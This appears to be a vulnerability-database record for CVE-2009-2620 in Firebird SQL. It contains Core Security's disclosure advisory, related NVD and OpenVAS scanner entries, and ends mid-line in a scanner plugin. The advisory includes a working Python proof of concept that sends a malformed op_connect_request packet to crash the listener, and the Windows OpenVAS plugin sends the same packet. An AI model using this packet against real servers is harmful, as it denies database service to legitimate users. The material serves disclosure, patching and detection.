{"id": "EDB-ID:9295", "hash": "59d7c0d8c9550c797bbba478302f0f09", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Firebird SQL op_connect_request main listener shutdown Vulnerability", "description": "Firebird SQL op_connect_request main listener shutdown Vulnerability. CVE-2009-2620. Dos exploit for windows platform", "published": "2009-07-28T00:00:00", "modified": "2009-07-28T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/9295/", "reporter": "Core Security", "references": [], "cvelist": ["CVE-2009-2620"], "lastseen": "2016-02-01T10:17:10", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2016-02-01T10:17:10"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2620"]}, {"type": "kaspersky", "idList": ["KLA10158"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310800852", "OPENVAS:64529", "OPENVAS:64742", "OPENVAS:800852", "OPENVAS:136141256231064739", "OPENVAS:64739", "OPENVAS:136141256231064742", "OPENVAS:136141256231064529"]}, {"type": "seebug", "idList": ["SSV:11922", "SSV:11929"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22234", "SECURITYVULNS:VULN:10107"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:79720"]}, {"type": "nessus", "idList": ["FEDORA_2009-8340.NASL", "FEDORA_2009-8317.NASL"]}], "modified": "2016-02-01T10:17:10"}, "vulnersScore": 6.9}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/9295/", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - CoreLabs Advisory\n http://www.coresecurity.com/corelabs/\n\nFirebird SQL op_connect_request main listener shutdown vulnerability\n\n\n1. *Advisory Information*\n\nTitle: Firebird SQL op_connect_request main listener shutdown vulnerability\nAdvisory ID: CORE-2009-0707\nAdvisory URL: http://www.coresecurity.com/content/firebird-sql-dos\nDate published: 2009-07-28\nDate of last update: 2009-07-28\nVendors contacted: Firebird SQL\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Denial of service (DoS)\nRemotely Exploitable: Yes\nLocally Exploitable: No\nBugtraq ID: 35842\nCVE Name: CVE-2009-2620\n\n\n3. *Vulnerability Description*\n\nFirebird SQL [1] is an open source relational database management system\noffering many ANSI SQL standard features that runs on Linux, Windows,\nand a variety of Unix platforms.\n\nA remote denial of service vulnerability has been found in Firebird SQL,\nwhich can be exploited by a remote attacker to force the server to close\nthe socket where it is listening for incoming connections and to enter\nan infinite loop, by sending an unexpected 'op_connect_request' message\nwith invalid data to the server.\n\n\n4. *Vulnerable packages*\n\n . Firebird SQL v1.5.5\n . Firebird SQL v2.0.1\n . Firebird SQL v2.0.5\n . Firebird SQL v2.1.1\n . Firebird SQL v2.1.2\n . Firebird SQL v2.1.3 RC1\n . Firebird SQL v2.5.0 Beta 1\n\n\n5. *Non-vulnerable packages*\n\n . Firebird SQL v2.1.3 Release Candidate 2 (estimated release: July 2009)\n . Firebird SQL v2.5 Beta 2 (estimated release: July 2009)\n . Firebird SQL v1.5.6 (estimated release: August 2009)\n . Firebird SQL v2.0.6 (estimated release: October 2009)\n\nPlease build a fresh CVS checkout to have a fixed version sooner.\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nThe issue is resolved in all branches of the Firebird SQL repository. It\nis registered in the Firebird SQL bug tracker as:\nhttp://tracker.firebirdsql.org/browse/CORE-2563\n\n\n7. *Credits*\n\nThis vulnerability was discovered and researched by Francisco Falcon\nfrom Core Security Technologies.\n\n\n8. *Technical Description / Proof of Concept Code*\n\n\n8.1. *Introduction*\n\nFirebird SQL is an open source relational database management system\noffering many ANSI SQL standard features that runs on Linux, Windows and\na variety of Unix platforms.\n\nA remote denial of service can be triggered by an unauthenticated\nattacker, by sending an unexpected 'op_connect_request' message with\ninvalid data of length greater than or equal to 12 bytes to the server.\n\nInside the server ('src/remote/server.cpp'), the function\n'process_packet2()' processes a packet received from a client. This\nfunction has a 'switch' statement that considers all the possible\nopcodes defined in the protocol (see 'P_OP' enum 'in\nsrc/remote/protocol.h').\n\n/-----------\n\nsrc/remote/server.cpp:\n\n...\n3404\tP_OP op = receive->p_operation;\n3405\tswitch (op)\n3406\t{\n3407\tcase op_connect:\n\t...\n3426\tcase op_compile:\n\t...\n3430\tcase op_attach:\n\t...\n\n- -----------/\n\n In the case of an 'op_connect_request' packet, the execution flow goes\nto the following 'case' in the 'switch' statement:\n\n/-----------\n\nsrc/remote/server.cpp:\n\n...\n3584\tcase op_connect_request:\n3585\t\taux_request(port, &receive->p_req, sendL);\n3586\t\tbreak;\n\n- -----------/\n\n After calling 'aux_request()' function and executing the 'break'\nstatement, execution lands here:\n\n/-----------\n\nsrc/remote/server.cpp:\n\n...\n3652\tif (port && port->port_state == state_broken) {\n3653\t\tif (!port->port_parent) {\n3654\t\t\tgds__log(\"SERVER/process_packet: broken port, server exiting\");\n3655\t\t\tport->disconnect(sendL, receive);\n3656\t\t\tThreadData::restoreSpecific();\n3657\t\t\treturn false;\n3658\t\t}\n3659\t\tport->disconnect(sendL, receive);\n3660\t\tport = NULL;\n3661\t}\n\n- -----------/\n\n By debugging the 'fbserver.exe' binary when it receives an\n'op_connect_request' packet, we can see that the conditions of the first\n'if' statement are satisfied, but the condition of the second 'if' is\nnot, so execution flow goes to the 'port->disconnect()' call:\n\n/-----------\n\n005ACE2C |> 837E 0C 03 CMP DWORD PTR DS:[ESI+C],3\n ;port->port_state == state_broken ?\n005ACE30 |. 75 1B JNZ SHORT fbserver.005ACE4D\n005ACE32 |. 837E 1C 00 CMP DWORD PTR DS:[ESI+1C],0\n ;port->port_parent == 0?\n005ACE36 |. 75 0A JNZ SHORT fbserver.005ACE42\n ;this conditional jump is taken\n005ACE38 |. 68 D4D65F00 PUSH fbserver.005FD6D4\n ; ASCII \"SERVER/process_packet: broken port, server exiting\"\n005ACE3D |.^ E9 44FDFFFF JMP fbserver.005ACB86\n005ACE42 |> 53 PUSH EBX\n ; /Arg2\n005ACE43 |. 57 PUSH EDI\n ; |Arg1\n005ACE44 |. 8BCE MOV ECX,ESI\n ; |\n005ACE46 |. E8 65D7FFFF CALL <fbserver.rem_port::disconnect>\n ; \\port->disconnect(sendL, receive)\n\n- -----------/\n\n The type of 'port' is 'struct rem_port', as defined in\n'src/remote/remote.h'. This struct type has a 'disconnect()' function\nthat is implemented in 'src/remote/server.cpp':\n\n/-----------\n\nsrc/remote/server.cpp:\n\n1464\tvoid rem_port::disconnect(PACKET* sendL, PACKET* receiveL)\n\n- -----------/\n\n Inside this function, the following code is executed, in order to free\nboth the sent and received packets and to close the corresponding sockets:\n\n/-----------\n\nsrc/remote/server.cpp:\n\n...\n1492\tREMOTE_free_packet(this, sendL);\n1493\tREMOTE_free_packet(this, receiveL);\n1494\tthis->disconnect();\n\n- -----------/\n\n That call to 'this->disconnect()' will ultimately lead to the\n'disconnect()' function in 'src/remote/inet.cpp'. This function is\nintended to break a remote connection, and receives a 'rem_port'\nstructure as parameter.\n\n/-----------\n\nsrc/remote/inet.cpp:\n\n1731\tstatic void disconnect( rem_port* port)\n1732\t{\n\n- -----------/\n\n In the first place, the function closes the connection established by\nthe client, by calling the 'shutdown' function:\n\n/-----------\n\nsrc/remote/inet.cpp:\n\n...\n1763\tif (port->port_handle && (SOCKET) port->port_handle !=\nINVALID_SOCKET) {\n1764\t\tshutdown((int) port->port_handle, 2);\n1765\t}\n\n- -----------/\n\n After that, as a comment line states, if the current 'rem_port'\nstructure being disconnected is a child of another 'rem_port' structure,\nit recursively calls 'disconnect()' to disconnect the 'rem_port' stored\nat 'port->port_async'. 'port_async' is a member of 'rem_port' struct\nthat describes an asynchronous sibling port.\n\n/-----------\n\nsrc/remote/inet.cpp:\n\n/* If this is a sub-port, unlink it from it's parent */\n...\n1789\trem_port* parent = port->port_parent;\n1790\tif (parent != NULL) {\n1791\t\tif (port->port_async) {\n1792\t\t\tdisconnect(port->port_async);\n1793\t\t\tport->port_async = NULL;\n1794\t\t}\n\n- -----------/\n\n But when that recursive call to 'disconnect()' is made, the\n'port->port_async' passed as parameter to be disconnected corresponds to\nthe main server socket, that is, the socket listening for incoming\nconnections on port 3050/TCP. Once in the recursive call, 'shutdown()'\nand 'closesocket()' functions are invoked, making the server to stop\nlistening on the default port 3050/TCP, thus denying the service to\nlegitimate users.\n\n\n8.2. *Remarks*\n\nAs a side effect, the 'fbserver.exe' process will enter an infinite\nloop, consuming 100% CPU time.\n\nOn Windows platform, in a default installation, Firebird SQL server is\ninstalled as a Windows service, and another service (the Firebird\nGuardian) runs together with the server, in order to automatically\nrestart the 'fbserver.exe' process if it crashes or stops running\nabnormally. However, in this case the Firebird Guardian is unable to\ndetect the denial of service condition, because the server does not\ncrash nor stops running.\n\nIn Firebird SQL 1.5.5 the behavior is different; the server will crash\ninside the 'aux_request()' function in 'src/remote/server.cpp' due to a\nnull pointer dereference, instead of silently shutting down its listener\nport. The problem arises when 'port->port_context' (which has a 'NULL'\nvalue at this point) is loaded into 'rdb' variable and then, at line\n'885', it is used as a pointer without properly checking that it points\nto a valid memory address:\n\n/-----------\n\nsrc/remote/server.cpp:\n\n...\n884\t\trdb = port->port_context;\n885\t\tport->send_response(send, rdb->rdb_id,\n886\t\t\t\tsend->p_resp.p_resp_data.cstr_length, status_vector);\n\n- -----------/\n\n\n\n\n8.3. *Proof of concept*\n\nThe following Python script will trigger the denial of service condition\non Firebird SQL, by sending an 'op_connect_request' packet with invalid\ndata of length greater than or equal to 12 bytes.\n\n\n/-----------\n\nimport socket\nimport time\n\ndef attack(host, port):\n op_connect_request = '\\x35' # Request to establish connection\n\n packet = '\\x00\\x00\\x00' + op_connect_request\n packet += \"A\" * 12 #Invalid data, must be >= 12 bytes\nin order to trigger the DoS\n\n print \"(+) Connecting to the server....\"\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n print \"(+) Sending op_connect_request packet...\"\n s.send(str(packet))\n s.close()\n print \"(+) op_connect_request packet successfully sent.\"\n\n #Wait 10 seconds and try to connect again to Firebird SQL server, to\ncheck if it's down\n print \"(+) Waiting 10 seconds before trying to reconnect to the\nserver...\"\n time.sleep(10)\n\n try:\n print \"(+) Trying to reconnect...\"\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n s.close()\n print \"(!) Something went wrong. The server is still alive.\"\n except socket.error:\n print \"(*) Attack successful. The server is down.\"\n\n\nport = 3050\nhost = '192.168.131.128' #Replace with your target host\nattack(host, port)\n\n- -----------/\n\n\n\n9. *Report Timeline*\n\n. 2009-07-15:\nCore Security Technologies notifies the Firebird team of the vulnerability.\n\n. 2009-07-16:\nFirebird team requests technical details in plaintext.\n\n. 2009-07-16:\nCore sends the advisory draft, including technical details.\n\n. 2009-07-20:\nFirebird team notifies that the issue is resolved in all branches of the\nFirebird repository [2]. Technical details will be publicly visible when\nCore releases its advisory. Firebird team notices that Firebird version\n1.5.5 (marked as non vulnerable in the advisory draft) seems to be\naffected.\n\n. 2009-07-27:\nCore sends the final version of the advisory to the Firebird team.\n\n. 2009-07-28:\nThe advisory CORE-2009-0707 is published.\n\n\n\n10. *References*\n\n[1] http://www.firebirdsql.org\n[2] http://tracker.firebirdsql.org/browse/CORE-2563\n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://www.coresecurity.com/corelabs.\n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company's flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\nhttp://www.coresecurity.com.\n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2009 Core Security\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\nprovided that no fee is charged for this distribution and proper credit\nis given.\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.8 (MingW32)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niEYEARECAAYFAkpvTl0ACgkQyNibggitWa17uQCeMYg7kPSMqmAB1vDNn7Q7xzel\n0BYAoJLL6358DsIP9wuSZDxTH3DiUp7Z\n=GgTL\n-----END PGP SIGNATURE-----\n\n# milw0rm.com [2009-07-28]\n", "osvdbidlist": ["56606"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:09:59", "bulletinFamily": "NVD", "description": "src/remote/server.cpp in fbserver.exe in Firebird SQL 1.5 before 1.5.6, 2.0 before 2.0.6, 2.1 before 2.1.3, and 2.5 before 2.5 Beta 2 allows remote attackers to cause a denial of service (daemon crash) via a malformed op_connect_request message that triggers an infinite loop or NULL pointer dereference.", "modified": "2017-09-19T01:29:00", "id": "CVE-2009-2620", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2620", "published": "2009-07-29T17:30:00", "title": "CVE-2009-2620", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2017-07-25T10:56:01", "bulletinFamily": "scanner", "description": "The remote host is missing an update to firebird\nannounced via advisory FEDORA-2009-8340.", "modified": "2017-07-10T00:00:00", "published": "2009-09-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64742", "id": "OPENVAS:64742", "title": "Fedora Core 11 FEDORA-2009-8340 (firebird)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8340.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8340 (firebird)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpgrade from previous package version may be a problem since previous version\nremove /var/run/firebird and it shouldn't\n\nThis release fix this problem for future updates\nIf you are in that case (no longer /var/run/firebird directory\nafter upgrade), just reinstall firebird-2.1.3.18185.0-2 package\nor create /var/run/firebird owned by user firebird\n\nChangeLog:\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update firebird' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8340\";\ntag_summary = \"The remote host is missing an update to firebird\nannounced via advisory FEDORA-2009-8340.\";\n\n\n\nif(description)\n{\n script_id(64742);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2620\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Core 11 FEDORA-2009-8340 (firebird)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=514463\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"firebird\", rpm:\"firebird~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-classic\", rpm:\"firebird-classic~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-devel\", rpm:\"firebird-devel~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-doc\", rpm:\"firebird-doc~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-filesystem\", rpm:\"firebird-filesystem~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-libfbclient\", rpm:\"firebird-libfbclient~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-libfbembed\", rpm:\"firebird-libfbembed~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-superserver\", rpm:\"firebird-superserver~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-debuginfo\", rpm:\"firebird-debuginfo~2.1.3.18185.0~2.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:51", "bulletinFamily": "scanner", "description": "The remote host is missing an update to firebird\nannounced via advisory FEDORA-2009-8317.", "modified": "2017-07-10T00:00:00", "published": "2009-09-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64739", "id": "OPENVAS:64739", "title": "Fedora Core 10 FEDORA-2009-8317 (firebird)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8317.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8317 (firebird)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpgrade from previous package version may be a problem since previous\nversion remove /var/run/firebird and it shouldn't.\nThis release fix this problem for future updates If you are in that\ncase (no longer /var/run/firebird directory after upgrade), just\nreinstall firebird-2.1.3.18185.0-2 package or create\n/var/run/firebird owned by user firebird\n\nChangeLog:\n\n* Wed Aug 5 2009 Philippe Makowski 2.1.3.18185.0-2\n- rename /usr/bin/gstat to /usr/bin/gstat-fb to avoid conflict with ganglia-gmond (rh #515510)\n- remove stupid rm -rf in postun\n* Thu Jul 30 2009 Philippe Makowski 2.1.3.18185.0-1\n- Update to 2.1.3.18185\n- Fix rh #514463\n- Remove doc patch\n- Apply backport initscript patch\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update firebird' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8317\";\ntag_summary = \"The remote host is missing an update to firebird\nannounced via advisory FEDORA-2009-8317.\";\n\n\n\nif(description)\n{\n script_id(64739);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2620\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Core 10 FEDORA-2009-8317 (firebird)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=514463\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"firebird\", rpm:\"firebird~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-classic\", rpm:\"firebird-classic~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-devel\", rpm:\"firebird-devel~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-doc\", rpm:\"firebird-doc~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-filesystem\", rpm:\"firebird-filesystem~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-libfbclient\", rpm:\"firebird-libfbclient~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-libfbembed\", rpm:\"firebird-libfbembed~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-superserver\", rpm:\"firebird-superserver~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"firebird-debuginfo\", rpm:\"firebird-debuginfo~2.1.3.18185.0~2.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:13:46", "bulletinFamily": "scanner", "description": "The host is running Firebird and is prone to Denial of Service\n Vulnerability.", "modified": "2016-12-28T00:00:00", "published": "2009-09-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=800852", "id": "OPENVAS:800852", "title": "Firebird SQL 'op_connect_request' Denial Of Service Vulnerability (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_firebird_dos_vuln_win.nasl 4865 2016-12-28 16:16:43Z teissa $\n#\n# Firebird SQL 'op_connect_request' Denial Of Service Vulnerability (Windows)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to cause Denial of Service in\n the affected application.\n Impact Level: Application\";\ntag_affected = \"Firebird SQL version 1.5 before 1.5.6, 2.0 before 2.0.6, 2.1 before 2.1.3,\n and 2.5 before 2.5 Beta 2 on Windows.\";\ntag_insight = \"The flaw is due to error in the 'rc/remote/server.cpp' in fbserver.exe.\n It fails to sanitise the input sent via a malformed op_connect_request\n message that triggers an infinite loop or NULL pointer dereference.\";\ntag_solution = \"Upgrade to version 1.5.6, 2.0.6, 2.1.3, or 2.5 Beta 2 or later\n http://www.firebirdsql.org/index.php?op=files\";\ntag_summary = \"The host is running Firebird and is prone to Denial of Service\n Vulnerability.\";\n\nif(description)\n{\n script_id(800852);\n script_version(\"$Revision: 4865 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-28 17:16:43 +0100 (Wed, 28 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-11 18:01:06 +0200 (Fri, 11 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2009-2620\");\n script_bugtraq_id(35842);\n script_name(\"Firebird SQL 'op_connect_request' Denial Of Service Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://tracker.firebirdsql.org/browse/CORE-2563\");\n script_xref(name : \"URL\" , value : \"http://www.coresecurity.com/content/firebird-sql-dos\");\n\n script_category(ACT_MIXED_ATTACK);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"find_service.nasl\", \"gb_firebird_detect_win.nasl\");\n script_require_keys(\"Firebird-SQL/Ver\");\n script_require_ports(3050);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\nfirebird_port = 3050;\n\nif(!get_port_state(firebird_port)){\n exit(0);\n}\n\nif(!safe_checks())\n{\n firebird_soc = http_open_socket(firebird_port);\n if(firebird_soc)\n {\n packet = raw_string(0x00, 0x00, 0x00, 0x35);\n packet += crap(data:\"A\", length:12);\n\n send(socket:firebird_soc, data:string(packet));\n close(firebird_soc);\n sleep(10);\n\n firebird_soc2 = http_open_socket(firebird_port);\n if(!firebird_soc2){\n security_message(firebird_port);\n exit(0);\n }\n close(firebird_soc2);\n }\n}\n\nver = get_kb_item(\"Firebird-SQL/Ver\");\n\nif(!isnull(ver))\n{\n # Grep for version 1.5 < 1.5.6, 2.0 < 2.0.6, 2.1 < 2.1.3, 2.5 < 2.5 Beta 2\n if(version_in_range(version:ver, test_version:\"1.5\", test_version2:\"1.5.5.4926\") ||\n version_in_range(version:ver, test_version:\"2.0\", test_version2:\"2.0.5.13206\")||\n version_in_range(version:ver, test_version:\"2.1\", test_version2:\"2.1.2.18118\")||\n version_in_range(version:ver, test_version:\"2.5\", 